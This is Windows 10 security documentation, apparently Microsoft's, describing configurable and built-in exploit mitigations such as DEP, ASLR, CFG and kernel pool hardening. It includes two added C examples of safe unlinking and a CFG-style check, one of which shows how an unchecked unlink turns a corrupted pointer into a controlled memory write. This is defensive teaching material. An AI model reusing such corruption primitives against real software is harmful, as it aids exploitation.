on their needs. Health attestation provides an end-to-end security model and integration points, which vendors and
software developers can use to build and integrate a customized solution.

Related topics
Protect derived domain credentials with Credential Guard
Device Guard deployment guide
Trusted Platform Module technology overview
Mitigate threats by using Windows 10 security features
4/5/2019 • 31 minutes to read

Applies to:
Windows 10
This topic provides an overview of some of the software and firmware threats faced in the current security
landscape, and the mitigations that Windows 10 offers in response to these threats. For information about related
types of protection offered by Microsoft, see Related topics.

SECTION CONTENTS

The security threat landscape
    Describes the current nature of the security threat landscape, and outlines how Windows 10 is designed to
    mitigate software exploits and similar threats.

Windows 10 mitigations that you can configure
    Provides tables of configurable threat mitigations with links to more information. Product features such as
    Device Guard appear in Table 1, and memory protection options such as Data Execution Prevention appear in
    Table 2.

Mitigations that are built in to Windows 10
    Provides descriptions of Windows 10 mitigations that require no configuration; they are built into the
    operating system. For example, heap protections and kernel pool protections are built into Windows 10.

Understanding Windows 10 in relation to the Enhanced Mitigation Experience Toolkit
    Describes how mitigations in the Enhanced Mitigation Experience Toolkit (EMET) correspond to features built
    into Windows 10 and how to convert EMET settings into mitigation policies for Windows 10.

This topic focuses on pre-breach mitigations aimed at device protection and threat resistance. These protections
work with other security defenses in Windows 10, as shown in the following illustration:
Figure 1. Device protection and threat resistance as part of the Windows 10 security defenses

The security threat landscape


Today's security threat landscape is one of aggressive and tenacious threats. In previous years, malicious attackers
mostly focused on gaining community recognition through their attacks or the thrill of temporarily taking a system
offline. Since then, attackers' motives have shifted toward making money, including holding devices and data
hostage until the owner pays the demanded ransom. Modern attacks increasingly focus on large-scale intellectual
property theft; targeted system degradation that can result in financial loss; and now even cyberterrorism that
threatens the security of individuals, businesses, and national interests all over the world. These attackers are
typically highly trained individuals and security experts, some of whom are in the employ of nation states that have
large budgets and seemingly unlimited human resources. Threats like these require an approach that can meet this
challenge.
In recognition of this landscape, the Windows 10 Creators Update (Windows 10, version 1703) includes multiple
security features that were created to make it difficult (and costly) to find and exploit many software vulnerabilities.
These features are designed to:
Eliminate entire classes of vulnerabilities
Break exploitation techniques
Contain the damage and prevent persistence
Limit the window of opportunity to exploit
The following sections provide more detail about security mitigations in Windows 10, version 1703.

Windows 10 mitigations that you can configure


Windows 10 mitigations that you can configure are listed in the following two tables. The first table covers a wide
array of protections for devices and users across the enterprise and the second table drills down into specific
memory protections such as Data Execution Prevention. Memory protection options provide specific mitigations
against malware that attempts to manipulate memory in order to gain control of a system.
Table 1 Windows 10 mitigations that you can configure

MITIGATION AND CORRESPONDING THREAT DESCRIPTION AND LINKS

Windows Defender SmartScreen Windows Defender SmartScreen can check the reputation of a
helps prevent downloaded application by using a service that Microsoft
malicious applications maintains. The first time a user runs an app that originates
from being downloaded from the Internet (even if the user copied it from another PC),
SmartScreen checks to see if the app lacks a reputation or is
known to be malicious, and responds accordingly.

More information: Windows Defender SmartScreen, later in


this topic

Credential Guard Credential Guard uses virtualization-based security to isolate


helps keep attackers secrets, such as NTLM password hashes and Kerberos Ticket
from gaining access through Granting Tickets, so that only privileged system software can
Pass-the-Hash or access them.
Pass-the-Ticket attacks Credential Guard is included in Windows 10 Enterprise and
Windows Server 2016.

More information: Protect derived domain credentials with


Credential Guard
MITIGATION AND CORRESPONDING THREAT DESCRIPTION AND LINKS

Enterprise certificate pinning Enterprise certificate pinning enables you to protect your
helps prevent internal domain names from chaining to unwanted certificates
man-in-the-middle attacks or to fraudulently issued certificates. With enterprise certificate
that leverage PKI pinning, you can “pin” (associate) an X.509 certificate and its
public key to its Certification Authority, either root or leaf.

More information: Enterprise Certificate Pinning

Device Guard Device Guard includes a Code Integrity policy that you create;
helps keep a device a whitelist of trusted apps—the only apps allowed to run in
from running malware or your organization. Device Guard also includes a powerful
other untrusted apps system mitigation called hypervisor-protected code integrity
(HVCI), which leverages virtualization-based security (VBS) to
protect Windows’ kernel-mode code integrity validation
process. HVCI has specific hardware requirements, and works
with Code Integrity policies to help stop attacks even if they
gain access to the kernel.
Device Guard is included in Windows 10 Enterprise and
Windows Server 2016.

More information: Introduction to Device Guard

Windows Defender Antivirus, Windows 10 includes Windows Defender Antivirus, a robust


which helps keep devices inbox antimalware solution. Windows Defender Antivirus has
free of viruses and other been significantly improved since it was introduced in
malware Windows 8.

More information: Windows Defender Antivirus, later in this


topic

Blocking of untrusted fonts Block Untrusted Fonts is a setting that allows you to prevent
helps prevent fonts users from loading fonts that are "untrusted" onto your
from being used in network, which can mitigate elevation-of-privilege attacks
elevation-of-privilege attacks associated with the parsing of font files. However, as of
Windows 10, version 1703, this mitigation is less important,
because font parsing is isolated in an AppContainer sandbox
(for a list describing this and other kernel pool protections, see
Kernel pool protections, later in this topic).

More information: Block untrusted fonts in an enterprise

Memory protections These mitigations, listed in Table 2, help to protect against


help prevent malware memory-based attacks, where malware or other code
from using memory manipulation manipulates memory to gain control of a system (for example,
techniques such as buffer malware that attempts to use buffer overruns to inject
overruns malicious executable code into memory. Note:
A subset of apps will not be able to run if some of these
mitigations are set to their most restrictive settings. Testing
can help you maximize protection while still allowing these
apps to run.

More information: Table 2, later in this topic


MITIGATION AND CORRESPONDING THREAT DESCRIPTION AND LINKS

UEFI Secure Boot Unified Extensible Firmware Interface (UEFI) Secure Boot is a
helps protect security standard for firmware built in to PCs by
the platform from manufacturers beginning with Windows 8. It helps to protect
bootkits and rootkits the boot process and firmware against tampering, such as
from a physically present attacker or from forms of malware
that run early in the boot process or in kernel after startup.

More information: UEFI and Secure Boot

Early Launch Antimalware (ELAM): helps protect the platform from rootkits disguised as drivers
Early Launch Antimalware (ELAM) is designed to enable the antimalware solution to start before all non-Microsoft drivers and apps. If malware modifies a boot-related driver, ELAM will detect the change, and Windows will prevent the driver from starting, thus blocking driver-based rootkits.
More information: Early Launch Antimalware

Device Health Attestation: helps prevent compromised devices from accessing an organization’s assets
Device Health Attestation (DHA) provides a way to confirm that devices attempting to connect to an organization's network are in a healthy state, not compromised with malware. When DHA has been configured, a device’s actual boot data measurements can be checked against the expected "healthy" boot data. If the check indicates a device is unhealthy, the device can be prevented from accessing the network.
More information: Control the health of Windows 10-based devices and Device Health Attestation

Configurable Windows 10 mitigations designed to help protect against memory manipulation require in-depth
understanding of these threats and mitigations and knowledge about how the operating system and applications
handle memory. The standard process for maximizing these types of mitigations is to work in a test lab to discover
whether a given setting interferes with any applications that you use so that you can deploy settings that maximize
protection while still allowing apps to run correctly.
As an IT professional, you can ask application developers and software vendors to deliver applications that include
an additional protection called Control Flow Guard (CFG). No configuration is needed in the operating system—
the protection is compiled into applications. More information can be found in Control Flow Guard.
Table 2 Configurable Windows 10 mitigations designed to help protect against memory exploits
MITIGATION AND CORRESPONDING THREAT DESCRIPTION

Data Execution Prevention (DEP): helps prevent exploitation of buffer overruns
Data Execution Prevention (DEP) is a system-level memory protection feature available in Windows operating systems. DEP enables the operating system to mark one or more pages of memory as non-executable, which prevents code from being run from that region of memory, to help prevent exploitation of buffer overruns.
DEP helps prevent code from being run from data pages such as the default heap, stacks, and memory pools. Although some applications have compatibility problems with DEP, the vast majority of applications do not.
More information: Data Execution Prevention, later in this topic.
Group Policy settings: DEP is on by default for 64-bit applications, but you can configure additional DEP protections by using the Group Policy settings described in Override Process Mitigation Options to help enforce app-related security policies.

SEHOP: helps prevent overwrites of the Structured Exception Handler
Structured Exception Handling Overwrite Protection (SEHOP) is designed to help block exploits that use the Structured Exception Handler (SEH) overwrite technique. Because this protection mechanism is provided at run-time, it helps to protect apps regardless of whether they have been compiled with the latest improvements. A few applications have compatibility problems with SEHOP, so be sure to test for your environment.
More information: Structured Exception Handling Overwrite Protection, later in this topic.
Group Policy setting: SEHOP is on by default for 64-bit applications, but you can configure additional SEHOP protections by using the Group Policy setting described in Override Process Mitigation Options to help enforce app-related security policies.

ASLR: helps mitigate malware attacks based on expected memory locations
Address Space Layout Randomization (ASLR) loads DLLs into random memory addresses at boot time. This helps mitigate malware that's designed to attack specific memory locations, where specific DLLs are expected to be loaded.
More information: Address Space Layout Randomization, later in this topic.
Group Policy settings: ASLR is on by default for 64-bit applications, but you can configure additional ASLR protections by using the Group Policy settings described in Override Process Mitigation Options to help enforce app-related security policies.

Windows Defender SmartScreen
Windows Defender SmartScreen notifies users if they click on reported phishing and malware websites, and helps
protect them against unsafe downloads or make informed decisions about downloads.
For Windows 10, Microsoft improved SmartScreen (now called Windows Defender SmartScreen) protection
capability by integrating its app reputation abilities into the operating system itself, which allows SmartScreen to
check the reputation of files downloaded from the Internet and warn users when they’re about to run a high-risk
downloaded file. The first time a user runs an app that originates from the Internet, SmartScreen checks the
reputation of the application by using digital signatures and other factors against a service that Microsoft
maintains. If the app lacks a reputation or is known to be malicious, SmartScreen warns the user or blocks
execution entirely, depending on how the administrator has configured Microsoft Intune or Group Policy settings.
For more information, see Windows Defender SmartScreen overview.
Windows Defender Antivirus
Windows Defender Antivirus in Windows 10 uses a multi-pronged approach to improve antimalware:
Cloud-delivered protection helps detect and block new malware within seconds, even if the malware has
never been seen before. The service, available as of Windows 10, version 1703, uses distributed resources
and machine learning to deliver protection to endpoints at a rate that is far faster than traditional signature
updates.
Rich local context improves how malware is identified. Windows 10 informs Windows Defender Antivirus
not only about content like files and processes but also where the content came from, where it has been
stored, and more. The information about source and history enables Windows Defender Antivirus to apply
different levels of scrutiny to different content.
Extensive global sensors help keep Windows Defender Antivirus current and aware of even the newest
malware. This is accomplished in two ways: by collecting the rich local context data from end points and by
centrally analyzing that data.
Tamper proofing helps guard Windows Defender Antivirus itself against malware attacks. For example,
Windows Defender Antivirus uses Protected Processes, which prevents untrusted processes from
attempting to tamper with Windows Defender Antivirus components, its registry keys, and so on. (Protected
Processes is described later in this topic.)
Enterprise-level features give IT pros the tools and configuration options necessary to make Windows
Defender Antivirus an enterprise-class antimalware solution.
For more information, see Windows Defender in Windows 10 and Windows Defender Overview for Windows
Server.
For information about Windows Defender Advanced Threat Protection, a service that helps enterprises to detect,
investigate, and respond to advanced and targeted attacks on their networks, see Windows Defender Advanced
Threat Protection (ATP) (resources) and Windows Defender Advanced Threat Protection (ATP) (documentation).
Data Execution Prevention
Malware depends on its ability to insert a malicious payload into memory with the hope that it will be executed
later. Wouldn’t it be great if you could prevent malware from running if it wrote to an area that has been allocated
solely for the storage of information?
Data Execution Prevention (DEP) does exactly that, by substantially reducing the range of memory that malicious
code can use for its benefit. DEP uses the No eXecute bit on modern CPUs to mark blocks of memory as read-only
so that those blocks can’t be used to execute malicious code that may be inserted by means of a vulnerability
exploit.
To use Task Manager to see apps that use DEP
1. Open Task Manager: Press Ctrl+Alt+Del and select Task Manager, or search the Start screen.
2. Click More Details (if necessary), and then click the Details tab.
3. Right-click any column heading, and then click Select Columns.
4. In the Select Columns dialog box, select the last Data Execution Prevention check box.
5. Click OK.
You can now see which processes have DEP enabled.
Figure 2. Processes on which DEP has been enabled in Windows 10
You can use Control Panel to view or change DEP settings.
To use Control Panel to view or change DEP settings on an individual PC
1. Open Control Panel, System: click Start, type Control Panel System, and press ENTER.
2. Click Advanced system settings, and then click the Advanced tab.
3. In the Performance box, click Settings.
4. In Performance Options, click the Data Execution Prevention tab.
5. Select an option:
Turn on DEP for essential Windows programs and services only
Turn on DEP for all programs and services except those I select. If you choose this option, use
the Add and Remove buttons to create the list of exceptions for which DEP will not be turned on.
To use Group Policy to control DEP settings
You can use the Group Policy setting called Process Mitigation Options to control DEP settings. A few
applications have compatibility problems with DEP, so be sure to test for your environment. To use the Group
Policy setting, see Override Process Mitigation Options to help enforce app-related security policies.
Structured Exception Handling Overwrite Protection
Structured Exception Handling Overwrite Protection (SEHOP) helps prevent attackers from being able to use
malicious code to exploit the Structured Exception Handler (SEH), which is integral to the system and allows (non-
malicious) apps to handle exceptions appropriately. Because this protection mechanism is provided at run-time, it
helps to protect applications regardless of whether they have been compiled with the latest improvements.
You can use the Group Policy setting called Process Mitigation Options to control the SEHOP setting. A few
applications have compatibility problems with SEHOP, so be sure to test for your environment. To use the Group
Policy setting, see Override Process Mitigation Options to help enforce app-related security policies.
Address Space Layout Randomization
One of the most common techniques used to gain access to a system is to find a vulnerability in a privileged
process that is already running, guess or find a location in memory where important system code and data have
been placed, and then overwrite that information with a malicious payload. Any malware that could write directly
to the system memory could simply overwrite it in well-known and predictable locations.
Address Space Layout Randomization (ASLR) makes that type of attack much more difficult because it randomizes
how and where important data is stored in memory. With ASLR, it is more difficult for malware to find the specific
location it needs to attack. Figure 3 illustrates how ASLR works by showing how the locations of different critical
Windows components can change in memory between restarts.

Figure 3. ASLR at work
Windows 10 applies ASLR holistically across the system and increases the level of entropy many times compared
with previous versions of Windows to combat sophisticated attacks such as heap spraying. 64-bit system and
application processes can take advantage of a vastly increased memory space, which makes it even more difficult
for malware to predict where Windows 10 stores vital data. When used on systems that have TPMs, ASLR
memory randomization will be increasingly unique across devices, which makes it even more difficult for a
successful exploit that works on one system to work reliably on another.
You can use the Group Policy setting called Process Mitigation Options to control ASLR settings (“Force ASLR”
and “Bottom-up ASLR”), as described in Override Process Mitigation Options to help enforce app-related security
policies.

Mitigations that are built in to Windows 10
Windows 10 provides many threat mitigations to protect against exploits that are built into the operating system
and need no configuration within the operating system. The table that follows describes some of these mitigations.
Control Flow Guard (CFG) is a mitigation that does not need configuration within the operating system, but does
require that an application developer configure the mitigation into the application when it’s compiled. CFG is built
into Microsoft Edge, IE11, and other areas in Windows 10, and can be built into many other applications when they
are compiled.
Table 3 Windows 10 mitigations to protect against memory exploits – no configuration needed
MITIGATION AND CORRESPONDING THREAT DESCRIPTION

SMB hardening for SYSVOL and NETLOGON shares: helps mitigate man-in-the-middle attacks
Client connections to the Active Directory Domain Services default SYSVOL and NETLOGON shares on domain controllers now require SMB signing and mutual authentication (such as Kerberos).
More information: SMB hardening improvements for SYSVOL and NETLOGON shares, later in this topic.

Protected Processes: help prevent one process from tampering with another process
With the Protected Processes feature, Windows 10 prevents untrusted processes from interacting or tampering with those that have been specially signed.
More information: Protected Processes, later in this topic.

Universal Windows apps protections: screen downloadable apps and run them in an AppContainer sandbox
Universal Windows apps are carefully screened before being made available, and they run in an AppContainer sandbox with limited privileges and capabilities.
More information: Universal Windows apps protections, later in this topic.

Heap protections: help prevent exploitation of the heap
Windows 10 includes protections for the heap, such as the use of internal data structures which help protect against corruption of memory used by the heap.
More information: Windows heap protections, later in this topic.

Kernel pool protections: help prevent exploitation of pool memory used by the kernel
Windows 10 includes protections for the pool of memory used by the kernel. For example, safe unlinking protects against pool overruns that are combined with unlinking operations that can be used to create an attack.
More information: Kernel pool protections, later in this topic.

Control Flow Guard: helps mitigate exploits that are based on flow between code locations in memory
Control Flow Guard (CFG) is a mitigation that requires no configuration within the operating system, but instead is built into software when it’s compiled. It is built into Microsoft Edge, IE11, and other areas in Windows 10. CFG can be built into applications written in C or C++, or applications compiled using Visual Studio 2015.
For such an application, CFG can detect an attacker’s attempt to change the intended flow of code. If this occurs, CFG terminates the application. You can request software vendors to deliver Windows applications compiled with CFG enabled.
More information: Control Flow Guard, later in this topic.

Protections built into Microsoft Edge (the browser): helps mitigate multiple threats
Windows 10 includes an entirely new browser, Microsoft Edge, designed with multiple security improvements.
More information: Microsoft Edge and Internet Explorer 11, later in this topic.

SMB hardening improvements for SYSVOL and NETLOGON shares
In Windows 10 and Windows Server 2016, client connections to the Active Directory Domain Services default
SYSVOL and NETLOGON shares on domain controllers require Server Message Block (SMB) signing and mutual
authentication (such as Kerberos). This reduces the likelihood of man-in-the-middle attacks. If SMB signing and
mutual authentication are unavailable, a computer running Windows 10 or Windows Server 2016 won’t process
domain-based Group Policy and scripts.

NOTE
The registry values for these settings aren’t present by default, but the hardening rules still apply until overridden by Group
Policy or other registry values. For more information on these security improvements, (also referred to as UNC hardening),
see Microsoft Knowledge Base article 3000483 and MS15-011 & MS15-014: Hardening Group Policy.

Protected Processes
Most security controls are designed to prevent the initial infection point. However, despite all the best preventative
controls, malware might eventually find a way to infect the system. So, some protections are built to place limits on
malware that gets on the device. Protected Processes creates limits of this type.
With Protected Processes, Windows 10 prevents untrusted processes from interacting or tampering with those
that have been specially signed. Protected Processes defines levels of trust for processes. Less trusted processes
are prevented from interacting with and therefore attacking more trusted processes. Windows 10 uses Protected
Processes more broadly across the operating system, and as in Windows 8.1, implements them in a way that can
be used by 3rd party anti-malware vendors, as described in Protecting Anti-Malware Services. This helps make the
system and antimalware solutions less susceptible to tampering by malware that does manage to get on the
system.
Universal Windows apps protections
When users download Universal Windows apps from the Microsoft Store, it’s unlikely that they will encounter
malware because all apps go through a careful screening process before being made available in the store. Apps
that organizations build and distribute through sideloading processes will need to be reviewed internally to ensure
that they meet organizational security requirements.
Regardless of how users acquire Universal Windows apps, they can use them with increased confidence. Universal
Windows apps run in an AppContainer sandbox with limited privileges and capabilities. For example, Universal
Windows apps have no system-level access, have tightly controlled interactions with other apps, and have no
access to data unless the user explicitly grants the application permission.
In addition, all Universal Windows apps follow the security principle of least privilege. Apps receive only the
minimum privileges they need to perform their legitimate tasks, so even if an attacker exploits an app, the damage
the exploit can do is severely limited and should be contained within the sandbox. The Microsoft Store displays the
exact capabilities the app requires (for example, access to the camera), along with the app’s age rating and
publisher.
Windows heap protections
The heap is a location in memory that Windows uses to store dynamic application data. Windows 10 continues to
improve on earlier Windows heap designs by further mitigating the risk of heap exploits that could be used as part
of an attack.
Windows 10 has several important improvements to the security of the heap:
Heap metadata hardening for internal data structures that the heap uses, to improve protections against
memory corruption.
Heap allocation randomization, that is, the use of randomized locations and sizes for heap memory
allocations, which makes it more difficult for an attacker to predict the location of critical memory to
overwrite. Specifically, Windows 10 adds a random offset to the address of a newly allocated heap, which
makes the allocation much less predictable.
Heap guard pages before and after blocks of memory, which work as tripwires. If an attacker attempts to
write past a block of memory (a common technique known as a buffer overflow ), the attacker will have to
overwrite a guard page. Any attempt to modify a guard page is considered a memory corruption, and
Windows 10 responds by instantly terminating the app.
Kernel pool protections
The operating system kernel in Windows sets aside two pools of memory, one that remains in physical memory
(“nonpaged pool”) and one that can be paged in and out of physical memory (“paged pool”). There are many types
of attacks that have been attempted against these pools, such as process quota pointer encoding; lookaside, delay
free, and pool page cookies; and PoolIndex bounds checks. Windows 10 has multiple “pool hardening” protections,
such as integrity checks, that help protect the kernel pool against such attacks.
In addition to pool hardening, Windows 10 includes other kernel hardening features:
Kernel DEP and Kernel ASLR: Follow the same principles as Data Execution Prevention and Address
Space Layout Randomization, described earlier in this topic.
Font parsing in AppContainer: Isolates font parsing in an AppContainer sandbox.
Disabling of NT Virtual DOS Machine (NTVDM): The old NTVDM kernel module (for running 16-bit
applications) is disabled by default, which neutralizes the associated vulnerabilities. (Enabling NTVDM
decreases protection against Null dereference and other exploits.)
Supervisor Mode Execution Prevention (SMEP): Helps prevent the kernel (the “supervisor”) from
executing code in user pages, a common technique used by attackers for local kernel elevation of privilege
(EOP). This requires processor support found in Intel Ivy Bridge or later processors, or ARM with PXN
support.
Safe unlinking: Helps protect against pool overruns that are combined with unlinking operations to create
an attack. Windows 10 includes global safe unlinking, which extends heap and kernel pool safe unlinking to
all usage of LIST_ENTRY and includes the “FastFail” mechanism to enable rapid and safe process
termination.
Memory reservations: The lowest 64 KB of process memory is reserved for the system. Apps are not
allowed to allocate that portion of the memory. This makes it more difficult for malware to use techniques
such as “NULL dereference” to overwrite critical system data structures in memory.
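The safe-unlinking check described in the list above, written out as an added example in portable C. This is not Windows source and not code from the page: the LIST_ENTRY type and the InitializeListHead/InsertTailList names follow the Windows kernel's naming, but the bodies, the RemoveEntryListSafe/RemoveEntryListUnsafe pair, BuildList and the demo_* functions are this example's own, and the decoy structure is a constructed stand-in for whatever data a corrupt link would otherwise point at. Where the kernel raises a fast-fail, the example returns a status so it runs to completion:

```c
#include <stddef.h>
#include <stdio.h>

/* Doubly linked list links in the style of the Windows LIST_ENTRY. */
typedef struct _LIST_ENTRY {
    struct _LIST_ENTRY *Flink;   /* forward link */
    struct _LIST_ENTRY *Blink;   /* backward link */
} LIST_ENTRY;

static void InitializeListHead(LIST_ENTRY *h) { h->Flink = h->Blink = h; }

static void InsertTailList(LIST_ENTRY *head, LIST_ENTRY *entry)
{
    LIST_ENTRY *last = head->Blink;
    entry->Flink = head;
    entry->Blink = last;
    last->Flink = entry;
    head->Blink = entry;
}

static int CountList(const LIST_ENTRY *head)
{
    int n = 0;
    for (const LIST_ENTRY *e = head->Flink; e != head; e = e->Flink) n++;
    return n;
}

/* Classic unlink: trusts Flink and Blink unconditionally. If an overrun
 * has replaced either pointer, the two stores below write a controlled
 * value to a controlled address. */
static void RemoveEntryListUnsafe(LIST_ENTRY *entry)
{
    LIST_ENTRY *f = entry->Flink, *b = entry->Blink;
    b->Flink = f;
    f->Blink = b;
}

/* Safe unlink: both neighbours must still point back at the entry being
 * removed; otherwise the list is corrupt and nothing is written. Windows
 * fast-fails the process at this point; the example returns 0 instead. */
static int RemoveEntryListSafe(LIST_ENTRY *entry)
{
    LIST_ENTRY *f = entry->Flink, *b = entry->Blink;
    if (f->Blink != entry || b->Flink != entry)
        return 0;                        /* corruption detected */
    b->Flink = f;
    f->Blink = b;
    return 1;
}

struct node { LIST_ENTRY links; int id; };

/* Build head -> a -> b -> c -> head. */
static void BuildList(LIST_ENTRY *head, struct node *a, struct node *b, struct node *c)
{
    InitializeListHead(head);
    a->id = 1; b->id = 2; c->id = 3;
    InsertTailList(head, &a->links);
    InsertTailList(head, &b->links);
    InsertTailList(head, &c->links);
}

/* Intact list: the safe unlink succeeds and 2 of the 3 entries remain. */
int demo_safe_unlink_on_intact_list(void)
{
    LIST_ENTRY head; struct node a, b, c;
    BuildList(&head, &a, &b, &c);
    if (!RemoveEntryListSafe(&b.links)) return -1;
    return CountList(&head);
}

/* Corrupted list: b's Blink is redirected (as an overrun of a's allocation
 * could do) to a decoy structure, a constructed stand-in for critical data.
 * Returns 1 if the safe unlink refused and left the decoy untouched. */
int demo_safe_unlink_detects_corruption(void)
{
    LIST_ENTRY head, decoy = { NULL, NULL }; struct node a, b, c;
    BuildList(&head, &a, &b, &c);
    b.links.Blink = &decoy;              /* simulated corruption */
    int refused = !RemoveEntryListSafe(&b.links);
    return refused && decoy.Flink == NULL;
}

/* Same corruption through the unchecked unlink: the decoy's Flink field
 * is overwritten with &c.links. Returns 1 if that write happened. */
int demo_unsafe_unlink_writes_through_corruption(void)
{
    LIST_ENTRY head, decoy = { NULL, NULL }; struct node a, b, c;
    BuildList(&head, &a, &b, &c);
    b.links.Blink = &decoy;
    RemoveEntryListUnsafe(&b.links);
    return decoy.Flink == &c.links;
}

int main(void)
{
    printf("intact list after safe unlink: %d entries\n", demo_safe_unlink_on_intact_list());
    printf("safe unlink refused corrupt entry: %d\n", demo_safe_unlink_detects_corruption());
    printf("unsafe unlink wrote through corrupt link: %d\n", demo_unsafe_unlink_writes_through_corruption());
    return 0;
}
```

The unchecked variant shows what the page's "pool overruns combined with unlinking operations" means: once one link is corrupt, the two unlink stores become a write to an address the corrupt pointer chose. The checked variant reads both neighbours' back-pointers before writing anything, which has the same shape as the check Windows applies to every LIST_ENTRY removal under global safe unlinking, with FastFail termination in place of the status return used here.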
Control Flow Guard
When applications are loaded into memory, they are allocated space based on the size of the code, requested
memory, and other factors. When an application begins to execute code, it calls additional code located in other
memory addresses. The relationships between the code locations are well known—they are written in the code
itself—but previous to Windows 10, the flow between these locations was not enforced, which gave attackers the
opportunity to change the flow to meet their needs.
This kind of threat is mitigated in Windows 10 through the Control Flow Guard (CFG) feature. When a trusted
application that was compiled to use CFG calls code, CFG verifies that the code location called is trusted for
execution. If the location is not trusted, the application is immediately terminated as a potential security risk.
An administrator cannot configure CFG; rather, an application developer can take advantage of CFG by configuring
it when the application is compiled. Consider asking application developers and software vendors to deliver
trustworthy Windows applications compiled with CFG enabled. For example, it can be enabled for applications
written in C or C++, or applications compiled using Visual Studio 2015. For information about enabling CFG for a
Visual Studio 2015 project, see Control Flow Guard.
Of course, browsers are a key entry point for attacks, so Microsoft Edge, IE, and other Windows features take full
advantage of CFG.
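The indirect-call check CFG performs, modelled in plain C as an added example (this is not Windows or compiler code and not from the page). The valid-target table stands in for the bitmap that the compiler and loader build for a CFG-enabled image, cfg_guarded_call stands in for the check the compiler inserts before each indirect call, and struct callback, the handler functions and the simulated pointer overwrite are all constructed for the example. Where a CFG-enabled process would fast-fail, the guard here reports the block through an out-parameter so the program runs to completion:

```c
#include <stddef.h>
#include <stdio.h>

/* Signature shared by every indirect-call target in this example. */
typedef int (*handler_fn)(int);

/* Addresses that are legitimate indirect-call targets. A CFG build derives
 * the real equivalent from every function whose address the code takes. */
#define MAX_TARGETS 16
static handler_fn g_valid_targets[MAX_TARGETS];
static size_t g_target_count;

static void cfg_register_target(handler_fn fn)
{
    if (g_target_count < MAX_TARGETS)
        g_valid_targets[g_target_count++] = fn;
}

static int cfg_is_valid_target(handler_fn fn)
{
    for (size_t i = 0; i < g_target_count; i++)
        if (g_valid_targets[i] == fn)
            return 1;
    return 0;
}

/* The guard: reject any indirect call whose target is not registered.
 * Real CFG terminates the process here; this version sets *blocked. */
static int cfg_guarded_call(handler_fn fn, int arg, int *blocked)
{
    if (!cfg_is_valid_target(fn)) {
        *blocked = 1;
        return -1;
    }
    *blocked = 0;
    return fn(arg);
}

/* Two legitimate handlers whose addresses the program takes ... */
static int double_it(int x) { return 2 * x; }
static int square_it(int x) { return x * x; }
/* ... and a function that is never a legitimate indirect-call target. */
static int never_called_indirectly(int x) { return x + 1; }

/* An object holding a function pointer: the kind of field that a
 * memory-corruption bug in the application could overwrite. */
struct callback { handler_fn fn; int arg; };

static void register_handlers(void)
{
    g_target_count = 0;
    cfg_register_target(double_it);
    cfg_register_target(square_it);
}

/* Intact callback: the guard passes and the handler's result is returned. */
int run_intact_callback(void)
{
    register_handlers();
    struct callback cb = { square_it, 7 };
    int blocked;
    return cfg_guarded_call(cb.fn, cb.arg, &blocked);
}

/* Callback whose pointer now refers to an unregistered function (assigned
 * directly here to stand in for a corruption bug). Returns 1 if the guard
 * blocked the call instead of executing it. */
int corrupted_callback_is_blocked(void)
{
    register_handlers();
    struct callback cb = { double_it, 7 };
    cb.fn = never_called_indirectly;     /* simulated pointer overwrite */
    int blocked;
    int r = cfg_guarded_call(cb.fn, cb.arg, &blocked);
    return blocked == 1 && r == -1;
}

int main(void)
{
    printf("intact callback result: %d\n", run_intact_callback());
    printf("corrupted callback blocked: %d\n", corrupted_callback_is_blocked());
    return 0;
}
```

Note what the check does and does not cover: any registered target passes, so the guard detects redirection to code that was never a legitimate indirect-call target, not a swap between two legitimate handlers of compatible signature. That granularity matches the real mechanism and is why the page presents CFG alongside DEP, ASLR and the heap and pool protections rather than on its own.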
Microsoft Edge and Internet Explorer 11
Browser security is a critical component of any security strategy, and for good reason: the browser is the user’s
interface to the Internet, an environment with many malicious sites and content waiting to attack. Most users
cannot perform at least part of their job without a browser, and many users are completely reliant on one. This
reality has made the browser the common pathway from which malicious hackers initiate their attacks.
All browsers enable some amount of extensibility to do things beyond the original scope of the browser. Two
common examples of this are Flash and Java extensions that enable their respective applications to run inside a
browser. Keeping Windows 10 secure for web browsing and applications, especially for these two content types, is
a priority.
Windows 10 includes an entirely new browser, Microsoft Edge. Microsoft Edge is more secure in multiple ways,
especially:
Smaller attack surface; no support for non-Microsoft binary extensions. Multiple browser
components with vulnerable attack surfaces have been removed from Microsoft Edge. Components that
have been removed include legacy document modes and script engines, Browser Helper Objects (BHOs),
ActiveX controls, and Java. However, Microsoft Edge supports Flash content and PDF viewing by default
through built-in extensions.
Runs 64-bit processes. A 64-bit PC running an older version of Windows often runs in 32-bit compatibility
mode to support older and less secure extensions. When Microsoft Edge runs on a 64-bit PC, it runs only
64-bit processes, which are much more secure against exploits.
Includes Memory Garbage Collection (MemGC). This helps protect against use-after-free (UAF) issues.
Designed as a Universal Windows app. Microsoft Edge is inherently compartmentalized and runs in an
AppContainer that sandboxes the browser from the system, data, and other apps. IE11 on Windows 10 can
also take advantage of the same AppContainer technology through Enhanced Protected Mode. However,
because IE11 can run ActiveX and BHOs, the browser and sandbox are susceptible to a much broader range
of attacks than Microsoft Edge.
Simplifies security configuration tasks. Because Microsoft Edge uses a simplified application structure
and a single sandbox configuration, there are fewer required security settings. In addition, Microsoft Edge
default settings align with security best practices, which makes it more secure by default.
In addition to Microsoft Edge, Microsoft includes IE11 in Windows 10, primarily for backwards-compatibility with
websites and with binary extensions that do not work with Microsoft Edge. It should not be configured as the
primary browser but rather as an optional or automatic switchover. We recommend using Microsoft Edge as the
primary web browser because it provides compatibility with the modern web and the best possible security.
For sites that require IE11 compatibility, including those that require binary extensions and plug-ins, enable
Enterprise mode and use the Enterprise Mode Site List to define which sites have the dependency. With this
configuration, when Microsoft Edge identifies a site that requires IE11, users will automatically be switched to IE11.
Functions that software vendors can use to build mitigations into apps
Some of the protections available in Windows 10 are provided through functions that can be called from apps or
other software. Such software is less likely to provide openings for exploits. If you are working with a software
vendor, you can request that they include these security-oriented functions in the application. The following table
lists some types of mitigations and the corresponding security-oriented functions that can be used in apps.

NOTE
Control Flow Guard (CFG) is also an important mitigation that a developer can include in software when it is compiled. For
more information, see Control Flow Guard, earlier in this topic.

Table 4 Functions available to developers for building mitigations into apps
MITIGATION / FUNCTION

LoadLib image loading restrictions: UpdateProcThreadAttribute function [PROCESS_CREATION_MITIGATION_POLICY_IMAGE_LOAD_NO_REMOTE_ALWAYS_ON]

MemProt dynamic code restriction: UpdateProcThreadAttribute function [PROCESS_CREATION_MITIGATION_POLICY_PROHIBIT_DYNAMIC_CODE_ALWAYS_ON]

Child Process Restriction to restrict the ability to create child processes: UpdateProcThreadAttribute function [PROC_THREAD_ATTRIBUTE_CHILD_PROCESS_POLICY]

